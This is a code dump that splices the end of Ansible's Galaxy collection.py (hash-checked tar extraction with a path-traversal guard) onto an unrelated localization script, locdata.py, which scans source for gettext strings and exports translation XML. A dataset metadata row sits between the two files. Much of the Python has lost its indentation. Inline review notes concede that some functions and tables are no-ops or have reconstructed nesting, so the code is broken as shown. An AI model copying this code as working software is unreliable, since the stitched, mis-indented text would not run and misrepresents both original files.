    with open(b_file_path, 'wb') as download_file:
        # Stream to disk while hashing so the response body is read only once.
        actual_hash = _consume_file(resp, download_file)

    if expected_hash:
        display.vvvv("Validating downloaded file hash %s with expected hash %s" % (actual_hash, expected_hash))
        if expected_hash != actual_hash:
            raise AnsibleError("Mismatch artifact hash with downloaded file")

    return b_file_path
def _extract_tar_file(tar, filename, b_dest, b_temp_path, expected_hash=None):
    """
    Extract *filename* from *tar* into the collection directory *b_dest* (bytes path),
    staging through a temp file under *b_temp_path* so the hash can be verified before
    the file lands in place.

    :param expected_hash: optional SHA256 hexdigest; mismatch raises AnsibleError.
    :raises AnsibleError: on checksum mismatch or a path-traversal attempt.
    """
    with _get_tar_file_member(tar, filename) as tar_obj:
        # Stage into a temp file, hashing as we copy.
        with tempfile.NamedTemporaryFile(dir=b_temp_path, delete=False) as tmpfile_obj:
            actual_hash = _consume_file(tar_obj, tmpfile_obj)

        if expected_hash and actual_hash != expected_hash:
            raise AnsibleError("Checksum mismatch for '%s' inside collection at '%s'"
                               % (to_native(filename, errors='surrogate_or_strict'), to_native(tar.name)))

        b_dest_filepath = os.path.abspath(os.path.join(b_dest, to_bytes(filename, errors='surrogate_or_strict')))
        b_parent_dir = os.path.dirname(b_dest_filepath)
        # Guard against tar entries like '../../evil' escaping the collection directory.
        if b_parent_dir != b_dest and not b_parent_dir.startswith(b_dest + to_bytes(os.path.sep)):
            raise AnsibleError("Cannot extract tar entry '%s' as it will be placed outside the collection directory"
                               % to_native(filename, errors='surrogate_or_strict'))

        if not os.path.exists(b_parent_dir):
            # Seems like Galaxy does not validate if all file entries have a corresponding dir ftype entry. This check
            # makes sure we create the parent directory even if it wasn't set in the metadata.
            os.makedirs(b_parent_dir, mode=0o0755)

        shutil.move(to_bytes(tmpfile_obj.name, errors='surrogate_or_strict'), b_dest_filepath)

        # Default to rw-r--r-- and only add execute if the tar file has execute.
        tar_member = tar.getmember(to_native(filename, errors='surrogate_or_strict'))
        new_mode = 0o644
        if stat.S_IMODE(tar_member.mode) & stat.S_IXUSR:
            new_mode |= 0o0111

        os.chmod(b_dest_filepath, new_mode)
def _get_tar_file_member(tar, filename):
    """Return the context-managed extraction handle for *filename* inside *tar*.

    :raises AnsibleError: when the tar has no member by that name.
    """
    n_filename = to_native(filename, errors='surrogate_or_strict')
    try:
        tar_member = tar.getmember(n_filename)
    except KeyError:
        raise AnsibleError("Collection tar at '%s' does not contain the expected file '%s'." % (
            to_native(tar.name),
            n_filename))
    else:
        return _tarfile_extract(tar, tar_member)
def _get_json_from_tar_file(b_path, filename):
    """
    Load and parse the JSON member *filename* from the collection tar at *b_path*.

    Bug fix: the previous implementation decoded each 64KiB chunk with to_text()
    independently, which corrupts (or raises on) a multi-byte UTF-8 sequence that
    straddles a chunk boundary. Accumulate the raw bytes and decode once at the end.
    """
    bufsize = 65536
    raw_chunks = []
    with tarfile.open(b_path, mode='r') as collection_tar:
        with _get_tar_file_member(collection_tar, filename) as tar_obj:
            data = tar_obj.read(bufsize)
            while data:
                raw_chunks.append(data)
                data = tar_obj.read(bufsize)

    return json.loads(to_text(b''.join(raw_chunks), errors='surrogate_or_strict'))
def _get_tar_file_hash(b_path, filename):
    """Return the SHA256 hexdigest of member *filename* inside the tar at *b_path*."""
    with tarfile.open(b_path, mode='r') as collection_tar:
        member_obj = _get_tar_file_member(collection_tar, filename)
        with member_obj as tar_obj:
            return _consume_file(tar_obj)
def _consume_file(read_from, write_to=None):
bufsize = 65536
sha256_digest = sha256()
data = read_from.read(bufsize)
while data:
if write_to is not None:
write_to.write(data)
write_to.flush()
sha256_digest.update(data)
data = read_from.read(bufsize)
return sha256_digest.hexdigest()
| k0ste/ansible | lib/ansible/galaxy/collection.py | Python | gpl-3.0 | 55,098 | [
"Galaxy"
] | 89ab83329a3f79b5ed29f3f0a010a9da897561d73a6e4f973860cdb96d6d82e5 |
#
# $Id: locdata.py 9954 2011-06-23 22:03:57Z ahartvigsen $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys, os, re, optparse, codecs, zipfile, glob, xml.dom.minidom
import subprocess
import _locpaths
import pslocale, ioutil, metadata, codescan
import sandbox
import vcs
from strdef import *
from textui.colors import *
from textui.ansi import *
# Matches strings-file names like '[prefix-]strings-xx[-_yy].ext';
# group 1 = optional prefix, group 2 = locale, group 3 = extension.
STRINGSFILE_PAT = re.compile(r'(?:(.+)-?)?strings-((?:[a-z][a-z])(?:[-_](?:[a-z][a-z]))?)\.(.+)', re.IGNORECASE)
# Matches _("...")/gettext('...') calls in source; group 3 is the string id.
GETTEXT_PAT = re.compile(r'(?<![a-zA-Z0-9_])(_|gettext)\s*\(\s*(["\'])(.*?)(?<!\\)\2\s*[\),]')
# Heuristic matchers for quoted literals that might be untranslated UI strings.
FIND_SINGLE_PAT = re.compile(r'([\'])(?!Ps|http|www\.)([\%\=\t \w\.@{}\(\)\<\>#/"\[\]\-:;&+]*?)([\'])', re.IGNORECASE)
FIND_DOUBLE_PAT = re.compile(r'(["])(?!Ps|http|www\.)([\%\=\t \w\.@{}\(\)\<\>#/\'\[\]\-:;&+]*?)(["])', re.IGNORECASE)
# Detects an HTML alt= attribute (alt text is translatable even inside markup).
ALT_PAT = re.compile(r'alt\=')
# Flags string-concatenation patterns that should use format specifiers instead.
FORMAT_SPECIFIERS_PAT = re.compile(r'(["\'])([\s\w][=\s\w\.@{}\(\)<>#/\'";:-]*)(["\'])((\s\+)([\s\w][\s\w\.@{}\(\)\<\>#/]*)(\s\+)([\s\.\w]*)(["\'])([\s\w][\s\w\.@{}\(\)\<\>#/\'"]*)(["\']))+')
# Matches // line comments so literals on commented lines can be ignored.
COMMENT_PAT = re.compile(r'[ \t]*//[= \w\.@{}\(\)<>#/\'";:-]*')
# Matches a backslash-escaped quote (\' or \") so it can be unescaped.
ESCAPED_QUOTE_PAT = re.compile(r'(?<!\\)\\([\'"])')
# Stricter canonical strings-file form: '[prefix-]strings-xx[_YY].ext'.
CANONICAL_STRINGSFILE_PAT = re.compile(r'(?:(.+)-)?strings-((?:[a-z][a-z])(?:_(?:[A-Z][A-Z]))?)\.(.+)')
# Matches "id": "value" pairs in translation JS vocabulary files.
TRANS_PAT = re.compile(r'^\s*(["\'])(.*?)(?<!\\)\1[\r\n\t ]*:[\r\n\t ]*(["\'])(.*?)(?<!\\)\3', re.MULTILINE)
# Boilerplate emitted at the top of generated translation JS files.
# NOTE(review): the interior indentation of these triple-quoted literals appears to
# have been lost in extraction - confirm exact whitespace against the original file.
JS_HEADER = u'''/*
* $Id: locdata.py 9954 2011-06-23 22:03:57Z ahartvigsen $
*
* Proprietary and confidential.
* Copyright $Date:: 2011#$ Perfect Search Corporation.
* All rights reserved.
*
*/
'''
# Header (with translator instructions) for exported .xml translation batches;
# '%s' is filled with the target locale.
TRANSFILE_HEADER = u'''<strings>
<!-- ____________________ INSTRUCTIONS FOR TRANSLATOR ________________________
A series of string pairs follow. Each pair contains an english value and an equivalent
in your language. If the equivalent is present, please review it for accuracy and correct
if necessary. If the equivalent has no useful value, please supply one.
In some cases, we have supplied a note providing additional context or explanation to
clarify how the string will be used. You can create your own notes as well, to ask us
questions; just add a <note lang="%s">...</note> to the appropriate string.
Strings may contain format specifiers (placeholders like "{0}") that will be replaced
with filenames, dates, and similar values at runtime. These placeholders are numbered
beginning with 0 (NOT 1). Please reorder them as needed to match the natural ordering
of your language. It is not necessarily an error to repeat a format specifier, so if
you see a string that uses {0} more than once, for example, preserve the duplication in
your translation.
You may also see an occasional <warning> tag. These are used to flag problems with our
English strings that we need to correct. We've included them so you can anticipate
tweaks we might make in the future.
-->
'''
def _stripJs(txt):
txt = txt.replace(u'\ufeff', u'')
txt = txt.strip()
if txt.startswith(u'/*'):
i = txt.find(u'*/')
assert(i > -1)
txt = txt[i + 2:]
lines = [x.strip() for x in txt.split(u'\n') if x.strip()]
txt = u'\n'.join(lines)
return txt
def jsIsDifferent(old, new):
    """True when two JS files differ after comment/whitespace normalization."""
    return _stripJs(old) != _stripJs(new)
def undoEscapes(txt):
    """Replace backslash-escaped quotes (\\' and \\") with the bare quote char."""
    return ESCAPED_QUOTE_PAT.sub(u'\\1', txt)
def prepForJson(txt):
    """Escape double quotes so *txt* can be embedded in a JSON string literal."""
    return txt.replace('"', '\\"')
def prepForXml(txt):
    """Escape XML special characters in *txt* with their predefined entities.

    Bug fix: the replacement table had been mangled (each character mapped to
    itself, making the function a no-op); restored the five predefined XML
    entities. Ampersand is replaced first so already-produced entities are not
    double-escaped.
    """
    prepChars = [u'&', u'<', u'>', u'"', u"'"]
    reChars = [u'&amp;', u'&lt;', u'&gt;', u'&quot;', u'&apos;']
    for i in range(len(prepChars)):
        txt = txt.replace(prepChars[i], reChars[i])
    return txt
def undoPrepForXml(txt):
    """Reverse prepForXml: turn the predefined XML entities back into characters.

    Bug fix: the entity table had been mangled (each entry mapped a character to
    itself, making the function a no-op); restored the five predefined XML
    entities. '&amp;' is decoded last so it cannot create new entity matches.
    """
    prepChars = [u'<', u'>', u'"', u"'", u'&']
    reChars = [u'&lt;', u'&gt;', u'&quot;', u'&apos;', u'&amp;']
    for i in range(len(prepChars)):
        txt = txt.replace(reChars[i], prepChars[i])
    return txt
# Mapping used by accentChars() to normalize accented characters in imported
# translation XML before parsing.
# NOTE(review): as extracted, every key is the literal accented character and every
# value is unichr() of that same code point, so each entry maps a character to
# itself and the table is a no-op. The keys were almost certainly HTML named
# entities (e.g. '&aacute;') before the text was mangled by extraction - confirm
# against the original file before relying on this table.
# NOTE: unichr() is Python 2 only.
_ACCENTS = {
    u'á':unichr(225),
    u'Á':unichr(193),
    u'à':unichr(224),
    u'À':unichr(192),
    u'â':unichr(226),
    u'Â':unichr(194),
    u'å':unichr(229),
    u'Å':unichr(197),
    u'ã':unichr(227),
    u'Ã':unichr(195),
    u'ä':unichr(228),
    u'Ä':unichr(196),
    u'æ':unichr(230),
    u'Æ':unichr(198),
    u'ç':unichr(231),
    u'Ç':unichr(199),
    u'é':unichr(233),
    u'É':unichr(201),
    u'è':unichr(232),
    u'È':unichr(200),
    u'ê':unichr(234),
    u'Ê':unichr(202),
    u'ë':unichr(235),
    u'Ë':unichr(203),
    u'í':unichr(237),
    u'Í':unichr(205),
    u'ì':unichr(236),
    u'Ì':unichr(204),
    u'î':unichr(238),
    u'Î':unichr(206),
    u'ï':unichr(239),
    u'Ï':unichr(207),
    u'ñ':unichr(241),
    u'Ñ':unichr(209),
    u'ó':unichr(243),
    u'Ó':unichr(211),
    u'ò':unichr(242),
    u'Ò':unichr(210),
    u'ô':unichr(244),
    u'Ô':unichr(212),
    u'ø':unichr(248),
    u'Ø':unichr(216),
    u'õ':unichr(245),
    u'Õ':unichr(213),
    u'ö':unichr(246),
    u'Ö':unichr(214),
    u'ß':unichr(223),
    u'ú':unichr(250),
    u'Ú':unichr(218),
    u'ù':unichr(249),
    u'Ù':unichr(217),
    u'û':unichr(251),
    u'Û':unichr(219),
    u'ü':unichr(252),
    u'Ü':unichr(220),
    u'ÿ':unichr(255)
}
def accentChars(txt):
    """Apply every substitution in the _ACCENTS table to *txt* and return the result."""
    for needle, replacement in _ACCENTS.items():
        txt = txt.replace(needle, replacement)
    return txt
def _get_xml_text(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
# Sentinel type objects used for runtime type checks (Python 2: str vs unicode).
_STR_TYPE = type('')
_USTR_TYPE = type(u'')
# Compiled-regex type; NOTE_PAT comes from strdef via 'from strdef import *'.
_REGEX_TYPE = type(NOTE_PAT)
def _read(path):
f = codecs.open(path, 'r', 'utf-8')
txt = f.read()
f.close()
return txt
def cvtMatches(matches, txt, path, idGrp, valGrp, locale):
    """Convert regex match objects into StrDef instances, each tagged with the
    file path and line number where the match was found."""
    converted = []
    for match in matches:
        linenum = codescan.getLineNumForOffset(txt, match.start())
        strdef = StrDef(undoEscapes(match.group(idGrp)), undoEscapes(match.group(valGrp)), locale)
        strdef.addLoc(FileLocation(path, linenum))
        converted.append(strdef)
    return converted
def findMisses(txt):
    """Heuristically locate quoted literals in *txt* that look like translatable UI
    strings but are not wrapped in _()/gettext(). Returns the surviving regex
    match objects.

    NOTE(review): indentation reconstructed from control flow (the source dump lost
    it); verify nesting against the original file.
    """
    # Context regexes: a literal preceded by one of these is config/id data, not UI text.
    excludeIfBefore = [
        '(tag|style|path|field|action|displayField|load|root|property|id|mode|action|size|dataIndex|itemSelector|uiprovider|Template|class|scale|align|ddGroup|record|theme|layout|margins|methond|name|region|mapping|type|pack|cls|event)\s*:\s?',
        '(Events|attribute|class|\.get|Ext\.getCmp|fireEvent|\.on|Ext\.get|Ext\.reg|\.set|child|\.selectValue|class)\(\s*',
        'throw ', 'var [\w]+ \=\s?', '\w=', 'attr\s?=\s?', 'return ', 'record\.data\[']
    excludeIfAfter = [':']
    found = [f for f in FIND_SINGLE_PAT.finditer(txt)] + [f for f in FIND_DOUBLE_PAT.finditer(txt)]
    i = 0
    while i < len(found):
        deleted = False
        # Drop matches fully nested inside another match.
        for f in found:
            if found[i].start() > f.start() and found[i].end() < f.end():
                del found[i]
                deleted = True
                break
        if deleted:
            continue
        # Drop literals immediately followed by an excluding token (e.g. a ':').
        for a in excludeIfAfter:
            after = re.compile(r'%s' % a, re.IGNORECASE)
            if after.findall(txt[found[i].end():found[i].end()+2]):
                #print txt[found[i].start():found[i].end()+2]
                del found[i]
                deleted = True
                break
        if deleted:
            continue
        # Drop literals whose 30 chars of leading context match an excluding pattern.
        for b in excludeIfBefore:
            before = re.compile(r'%s' % b, re.IGNORECASE)
            if found[i].start() < 30:
                start = 0
            else:
                start = found[i].start()-30
            if before.findall(txt[start:found[i].start()]):
                #print txt[start:found[i].end()]
                del found[i]
                deleted = True
                break
        if deleted:
            continue
        check = found[i].group(2)
        if check == '':
            del found[i]
            continue
        # Pure template placeholder like '{0}'.
        if check[0] == '{' and check[len(check)-1] == '}':
            del found[i]
            continue
        # Relative path / file reference.
        if check[0] == '.' or check[0] == '/':
            del found[i]
            continue
        # Crude "real word" test: require at least one vowel and one alphabetic char.
        vowels = ['a', 'e', 'i', 'o', 'u']
        vowel = False
        alpha = False
        for c in check:
            if c in vowels:
                vowel = True
            if c.isalpha():
                alpha = True
            if alpha and vowel:
                break
        if (not vowel) or (not alpha):
            del found[i]
            continue
        # Markup with no translatable text.
        if pureHTML(check):
            del found[i]
            continue
        i += 1
    return found
def pureHTML(txt):
    """Return True when *txt* consists only of HTML tags and {n} placeholders
    (i.e. contains no translatable text). Markup containing an alt= attribute is
    NOT considered pure, since alt text is translatable.

    NOTE(review): indentation reconstructed from control flow (the source dump lost
    it); verify nesting against the original file.
    """
    if txt[0] == '<' and txt[len(txt)-1] == '>':
        find = ALT_PAT.findall(txt)
        if find:
            return False
        # After a '>' only another tag or a placeholder may begin.
        prev = False
        for c in txt:
            if prev:
                if c != '<' and c != '{':
                    return False
                prev = False
            if c == '>':
                prev = True
        # Second pass: anything between tags must be a complete {..} placeholder.
        lastFound = txt.find('>')
        while lastFound > -1 and lastFound < len(txt)-1:
            if txt[lastFound+1] != '<':
                if txt[lastFound+1] != '{':
                    return False
                close = txt.find('}',lastFound)
                if txt[close+1] != '<':
                    return False
            lastFound = txt.find('>', lastFound+1)
        return True
    return False
def parseSrc(path, relpath, component):
    """Scan one source file and return (gettext matches, possible missed strings,
    format-specifier errors) as lists of StrDef objects located by file/line.

    NOTE(review): indentation reconstructed from control flow (the source dump lost
    it); verify nesting against the original file.
    """
    txt = _read(path)
    nextInactiveBlock = codescan.pickInactiveBlockFinder(path)
    # Remove all the inactive blocks from our analysis.
    txt = codescan.getActiveBlocksOnly(txt, nextInactiveBlock)
    matches = cvtMatches([m for m in GETTEXT_PAT.finditer(txt)], txt, relpath, 3, 3, 'en')
    found = cvtMatches(findMisses(txt), txt, relpath, 2, 2, 'en')
    formatSpecErr = cvtMatches([m for m in FORMAT_SPECIFIERS_PAT.finditer(txt)], txt, relpath, 0, 0, 'en')
    comments = cvtMatches([m for m in COMMENT_PAT.finditer(txt)], txt, relpath, 0, 0, 'en')
    if found:
        # Suppress anything whitelisted in the .do-not-extract.txt files.
        # NOTE: file() is the Python 2 builtin; these handles are never closed explicitly.
        cr = path[0:path.find(relpath)]
        doNotExtract = file(os.path.join(cr, 'buildscripts/.do-not-extract.txt').replace('\\', '/')).read().split('\n')
        doNotExtract += file(os.path.join(cr, component, '.do-not-extract.txt').replace('\\', '/')).read().split('\n')
        i = 0
        while i < len(found):
            deleted = False
            if found[i].id in doNotExtract:
                del found[i]
                continue
            # Already wrapped with _() on the same line - not a miss.
            for m in matches:
                if deleted:
                    break
                if m.id == found[i].id:
                    if m.fileLocs[0].line == found[i].fileLocs[0].line:
                        del found[i]
                        deleted = True
            # On a line already flagged as a format-specifier error.
            for err in formatSpecErr:
                if deleted:
                    break
                if err.fileLocs[0].line == found[i].fileLocs[0].line:
                    del found[i]
                    deleted = True
            # On a commented-out line.
            for c in comments:
                if deleted:
                    break
                if c.fileLocs[0].line == found[i].fileLocs[0].line:
                    del found[i]
                    deleted = True
            if deleted:
                continue
            i += 1
    if matches:
        pass #print(relpath)
    return matches, found, formatSpecErr
def parseTrans(path, relpath, locale):
    """Parse a translation strings file, returning a StrDef for each id/value pair
    found by TRANS_PAT (group 2 = id, group 4 = translated value)."""
    raw = _read(path)
    # Remove conditionally-inactive code regions before scanning.
    finder = codescan.pickInactiveBlockFinder(path)
    active = codescan.getActiveBlocksOnly(raw, finder)
    return cvtMatches([m for m in TRANS_PAT.finditer(active)], active, relpath, 2, 4, locale)
class FakeFile:
    """File-like sink that records everything written to it in self.txt."""

    def __init__(self):
        self.txt = ''

    def write(self, txt):
        # Accumulate the raw text exactly as given.
        self.txt = self.txt + txt

    def printf(self, txt):
        # Echo to the console and record the line with a trailing newline.
        print (txt)
        self.write('%s\n' % txt)
class LocData:
    """Aggregates localization data for a source tree: extracted English strings
    (self.src), translation files (self.trans), per-locale lookup tables
    (self.byLocale), and per-component strings-file naming patterns
    (self.pathsByComponent)."""
    def __init__(self, root, testing=False):
        """Scan *root* (unless *testing*) by visiting every UI path and parsing
        source and strings files, then link translations to their English sources."""
        self._svnInfo = None
        self.trans = {}               # relpath -> list of StrDef from strings files
        self.src = {}                 # relpath -> list of StrDef from gettext calls
        self.byLocale = {}            # locale -> {id: StrDef}
        self.pathsByComponent = {}    # component -> [(ui, naming pattern), ...]
        self.possibleMisses = {}      # relpath -> possible untranslated literals
        self.formatErrors = {}        # relpath -> format-specifier violations
        root = ioutil.norm_folder(root)
        self.conf = metadata.Conf(root, report=False)
        # Python 2: promote byte-string paths to unicode.
        if type(root) == _STR_TYPE:
            root = unicode(root, 'utf-8')
        self.root = root
        if not testing:
            fileCount, folderCount = metadata.visit(self.root, visitor=self, recurser=self, report=False)
            self._connect()
def getComponent(self, relpath):
    """Return the first path segment of *relpath* (the component name)."""
    if os.name == 'nt':
        relpath = relpath.replace('\\', '/')
    slash = relpath.find('/')
    return relpath[0:slash] if slash > -1 else relpath
def getNamingPat(self, relpath):
    """Derive the printf-style naming pattern ('[prefix-]strings-%s[.ext]') from
    a strings-file path; asserts the path matches STRINGSFILE_PAT."""
    if os.name == 'nt':
        relpath = relpath.replace('\\', '/')
    match = STRINGSFILE_PAT.match(relpath)
    assert(match)
    pattern = 'strings-%s'
    if match.group(1):
        pattern = match.group(1) + pattern
    if match.group(3):
        pattern = pattern + '.' + match.group(3)
    return pattern
def select(self, folder, dirs):
    """Recursion filter for metadata.visit: prune top-level components that only
    target English and any directory whose name starts with 'test'.

    NOTE(review): indentation reconstructed (source dump lost it) - in particular
    whether the 'test' filter is limited to the root level; verify against original.
    """
    if folder == self.root:
        # Iterate a copy so removal during iteration is safe.
        for d in dirs[:]:
            conf = metadata.Conf(os.path.join(folder, d), report=False)
            tl = conf.getTargetedLocales()
            if tl:
                if len(tl) == 1 and 'en' in tl:
                    if conf.report:
                        print("Ignoring %s, since it doesn't support localization." % d)
                    dirs.remove(d)
    for d in dirs[:]:
        if d.lower().startswith('test'):
            dirs.remove(d)
    return dirs
def visit(self, folder, item, relativePath):
    """metadata.visit callback for one file: strings files are parsed into
    self.trans and registered in pathsByComponent (warning on inconsistent
    naming); other files are scanned for gettext strings, possible misses and
    format errors.

    NOTE(review): indentation reconstructed (source dump lost it) - notably the
    while/else that locates the nearest metadata file and the extent of the
    per-UI-path 'if' body; verify against original.
    """
    # Walk up from *folder* toward the base looking for the nearest metadata file.
    baseFolder = folder.replace(relativePath, '')
    truncated = folder
    if baseFolder[-1] == '/':
        startFolder = baseFolder[0:baseFolder.rfind('/')]
    else:
        startFolder = baseFolder
    while truncated != startFolder:
        truncated = truncated[0:truncated.rfind('/')]
        if metadata.METADATA_FILE in os.listdir(truncated):
            conf = metadata.Conf(truncated, report=False)
            break
    else:
        conf = None
    uiPaths = conf.getUiPaths()
    for ui in uiPaths:
        # Only files inside a declared UI path are localizable.
        if relativePath.find(uiPaths[ui]) > -1:
            files = os.listdir(folder)
            fullpath = os.path.join(folder, item)
            relpath = relativePath + item
            if type(relpath) == _STR_TYPE:
                relpath = unicode(relativePath + item, 'utf-8')
            m = STRINGSFILE_PAT.match(item)
            if m:
                component = self.getComponent(relpath)
                namingPat = self.getNamingPat(relpath)
                old = self.pathsByComponent.get(component, None)
                if old:
                    for o in old:
                        oldUI, oldPat = o
                        if oldUI == conf.getUi(relativePath):
                            if namingPat != oldPat:
                                print('Warning: %s does not match naming pattern %s. Components have some flexibility in how strings files are named and located, but must be internally consistent.' % (relpath, namingPat))
                            else:
                                if self.pathsByComponent[component].count((conf.getUi(relativePath), namingPat)) == 0:
                                    self.pathsByComponent[component].append((conf.getUi(relativePath), namingPat))
                else:
                    self.pathsByComponent[component] = [(conf.getUi(relpath), namingPat)]
                if not CANONICAL_STRINGSFILE_PAT.match(item):
                    print('Warning: %s does not match the canonical naming pattern for strings files ([prefix-]strings-xx[_YY]*.*).' % item)
                # m.group(2) is the locale portion of the filename.
                self.trans[relpath] = parseTrans(fullpath, relpath, m.group(2))
            else:
                data, misses, formatErr = parseSrc(fullpath, relpath, self.getComponent(relpath))
                if data:
                    self.src[relpath] = data
                if misses:
                    self.possibleMisses[relpath] = misses
                if formatErr:
                    self.formatErrors[relpath] = formatErr
def getTargetedLocales(self, component):
    """Locales targeted by *component* per its metadata, falling back to the
    standard locale set when none are declared."""
    targeted = self.conf.getTargetedLocales(component)
    return targeted if targeted else pslocale.getStandardLocales()
def update(self, relpath):
    """Regenerate the translation JS for *relpath* and write it if it differs
    from what is on disk; 'bzr add' brand-new files. Returns True when the file
    was (re)written."""
    txt = self.getTransText(relpath)
    if txt:
        fullpath = self.root + relpath
        add = not os.path.isfile(fullpath)
        # jsIsDifferent ignores header-comment/whitespace-only differences.
        if ioutil.write_if_different(fullpath, txt, compare_func=jsIsDifferent):
            if add:
                os.system('bzr add %s' % fullpath)
            else:
                print('%s has been modified and needs to be checked in.' % relpath)
            return True
    return False
def getTransText(self, relpath):
    """Build the translation JS vocabulary text for the locale encoded in
    *relpath* (STRINGSFILE_PAT group 2). Only ids that still exist in English
    are emitted. Returns u'' when there is no data for that locale.

    NOTE(review): indentation reconstructed and interior whitespace of the emitted
    string literals may have been lost in extraction; verify against original.
    """
    txt = u''
    m = STRINGSFILE_PAT.match(relpath)
    locale = m.group(2)
    trans = self.byLocale.get(locale, None)
    if trans:
        en = self.byLocale['en']
        ids = trans.keys()[:]   # Python 2: keys() is a list; copy then sort.
        ids.sort()
        for id in ids:
            if id in en:
                t = trans[id]
                txt += u' "%s": "%s",\n' % (prepForJson(t.id), prepForJson(t.txt))
        if txt:
            # Trim the trailing ',\n' before closing the vocabulary object.
            txt = u'{\n vocabulary: {\n' + txt[0:-2] + u'\n }\n}\n'
        else:
            txt += u'{\n}\n'
        txt = JS_HEADER + txt
    return txt
def fileNeedsSync(self, relpath):
    """True when the generated translation JS for *relpath* differs from the
    file currently on disk (header/whitespace differences ignored)."""
    txt = self.getTransText(relpath)
    if not txt:
        return False
    return ioutil.file_differs_from_text(self.root + relpath, txt, compare_func=jsIsDifferent)
def exportFile(self, fullpath, relpath):
    """Write one translator batch file: '<fullpath>.xml' containing every English
    string used under *relpath*'s directory, paired with the existing translation
    (or '?' when missing), plus an <info> block of counts.

    NOTE(review): indentation reconstructed and interior whitespace of the emitted
    XML literals may have been lost in extraction; verify against original.
    """
    m = STRINGSFILE_PAT.match(fullpath)
    locale = m.group(2)
    fullpath += '.xml'
    txt = TRANSFILE_HEADER % locale
    trans = self.byLocale.get(locale, None)
    if not trans:
        trans = {}
    en = self.byLocale['en']
    ids = en.keys()[:]   # Python 2: keys() is a list; copy then sort.
    ids.sort()
    newCount = 0
    reviewCount = 0
    wordCountEng = 0
    wordCountTrans = 0
    chunk = u''
    for id in ids:
        enstr = en[id]
        # Only export strings used somewhere under this relpath's directory.
        add = False
        for loc in enstr.fileLocs:
            if relpath[0:relpath.rfind('/')] in loc.path:
                add = True
        if add:
            if not id in trans or trans[id].getValue() == u'?':
                newCount += 1
            else:
                reviewCount += 1
            if id in trans:
                wordCountTrans += trans[id].getWordCount()
            wordCountEng += en[id].getWordCount()
            if id in trans:
                strdef = trans[id]
            else:
                strdef = StrDef(id, '?', locale)
            chunk += u' <string>\n'
            chunk += u' <val lang="en">%s</val>\n' % prepForXml(enstr.getValue())
            note = enstr.getNote()
            if note:
                chunk += u' <note lang="en">%s</note>\n' % note
            warnings = enstr.getWarnings()
            if warnings:
                enstr.warn()
                chunk += u' <warnings>' + ' '.join(warnings) + u'</warnings>\n'
            chunk += u' <val lang="%s">%s</val>\n' % (locale, prepForXml(strdef.getValue()))
            chunk += u' </string>\n\n'
    txt += u' <info>\n'
    txt += u' <newStrings>%d</newStrings>\n' % newCount
    txt += u' <reviewStrings>%d</reviewStrings>\n' % reviewCount
    txt += u' <numStrings>%d</numStrings>\n' % (newCount + reviewCount)
    txt += u' <wordCountEnglish>%d</wordCountEnglish>\n' % wordCountEng
    txt += u' <wordCount%s>%d</wordCount%s>\n' % (locale, wordCountTrans, locale)
    txt += u' <relativePath>%s</relativePath>\n' % relpath
    txt += u' </info>\n\n'
    txt += chunk
    txt += u'</strings>\n'
    ioutil.write_if_different(fullpath, txt)
    print(fullpath)
def generateMartian(self):
    """Build the pseudo-locale ('ma') table by converting every English StrDef
    with martian.convert().

    NOTE(review): 'martian' is not among the imports visible at the top of this
    file - confirm it is imported elsewhere or this raises NameError at runtime.
    """
    en = self.byLocale['en']
    ma = {}
    for id in en.keys():
        strdef = en[id]
        ma[id] = StrDef(strdef.id, martian.convert(strdef.txt), 'ma')
    return ma
def getProject(self):
    # Top-level component name of the sandbox containing the configured path.
    return sandbox.create_from_within(self.conf.path).get_top_component()
def get_branch(self):
    # Branch name of the sandbox containing the configured path.
    return sandbox.create_from_within(self.conf.path).get_branch()
def getRevision(self):
    """Return the working-tree revision number of the sandbox's top-component
    branch, via the vcs abstraction.

    Bug fix: everything after the return statement (an old subprocess-based
    'bzr revno --tree' fallback) was unreachable dead code and has been removed.
    """
    sb = sandbox.create_from_within(self.conf.path)
    branchLocation = os.path.join(sb.get_code_root(), sb.get_top_component())
    return vcs.revno(branchLocation, True)
def getBatchName(self):
    """Compose the export batch name: '<project>[-<branch>]-<revno>', with the
    branch segment omitted for trunk."""
    name = self.getProject() + '-'
    branch = self.get_branch()
    if branch != 'trunk':
        name += branch + '-'
    return name + str(self.getRevision())
def export(self, folder):
    """Export translator batch files for every non-English targeted locale of
    every component into '<folder>/<batchname>/', nuking any previous batch of
    the same name, then zip the results per locale.

    NOTE(review): indentation reconstructed (source dump lost it); verify nesting
    against original.
    """
    if os.path.exists(folder):
        assert(os.path.isdir(folder))
    path = ioutil.norm_folder(folder) + self.getBatchName() + '/'
    print('exporting to %s' % path)
    if os.path.exists(path):
        ioutil.nuke(path)
    os.makedirs(path)
    for component in self.pathsByComponent:
        locales = self.getTargetedLocales(component)
        pathPats = self.pathsByComponent[component]
        for paths in pathPats:
            pathPat = paths[1]   # the 'strings-%s' naming pattern
            for loc in locales:
                if loc != 'en':
                    relpath = pathPat % loc
                    fullpath = path + relpath
                    fldr = os.path.dirname(fullpath)
                    if not os.path.exists(fldr):
                        os.makedirs(fldr)
                    self.exportFile(fullpath, relpath)
    self.zip(folder)
def sync(self):
    """Regenerate on-disk translation JS for every non-English locale (including
    the generated 'ma' pseudo-locale) of every component, reporting how many
    files changed.

    NOTE(review): indentation reconstructed (source dump lost it). The dump shows
    two loops over self.pathsByComponent with 'locales' computed in the first;
    the nesting chosen here mirrors the flat layout of check() - verify against
    the original, as the reconstructed form re-walks all components per component.
    """
    updateCount = 0
    for component in self.pathsByComponent:
        locales = self.getTargetedLocales(component)
        if not ('ma' in locales):
            locales.append('ma')
        self.byLocale['ma'] = self.generateMartian()
        for component in self.pathsByComponent.keys():
            pathPats = self.pathsByComponent[component]
            for paths in pathPats:
                pathPat = paths[1]
                for loc in locales:
                    if loc != 'en':
                        relpath = pathPat % loc
                        if self.update(relpath):
                            updateCount += 1
    print('Updated %d files.' % updateCount)
def check(self, component=''):
    """Return (strings with warnings, relpaths whose generated JS is out of sync
    with disk) across all targeted locales plus the 'ma' pseudo-locale.

    NOTE(review): indentation reconstructed (source dump lost it); verify whether
    generateMartian() belongs inside the 'ma not in locales' branch.
    """
    strsWithWarnings = [self.byLocale['en'][id] for id in self.byLocale['en'].keys()]
    strsWithWarnings = [x for x in strsWithWarnings if x.getWarnings()]
    needsSync = []
    locales = self.getTargetedLocales(component)
    if not ('ma' in locales):
        locales.append('ma')
